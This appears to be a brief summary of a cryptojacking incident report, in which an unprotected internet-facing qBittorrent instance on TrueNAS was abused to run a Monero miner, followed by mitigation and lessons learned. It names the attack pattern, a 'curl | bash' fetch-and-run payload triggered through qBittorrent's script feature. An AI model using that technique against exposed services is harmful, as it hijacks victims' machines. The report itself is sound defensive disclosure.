I got infected with a crypto-miner via misconfigured qBittorrent
10 hours ago
- #Cryptojacking
- #Security Breach
- #Network Hardening
- Noticed persistently high CPU usage in qBittorrent app on TrueNAS, which returned to normal after restarting.
- Investigated and found suspicious processes running a Monero crypto-miner from c3pool.com via the qBittorrent app.
- The breach occurred due to an open qBittorrent instance accessible from the internet without password protection.
- Attackers exploited qBittorrent's script feature to execute a malicious payload (curl | bash) when torrents were downloaded.
- Mitigated the issue by securing qBittorrent behind an OIDC proxy and reporting the offending IP to Linode/Akamai.
- Lessons learned include the need for network segmentation, VLANs, and stricter firewalling to prevent future incidents.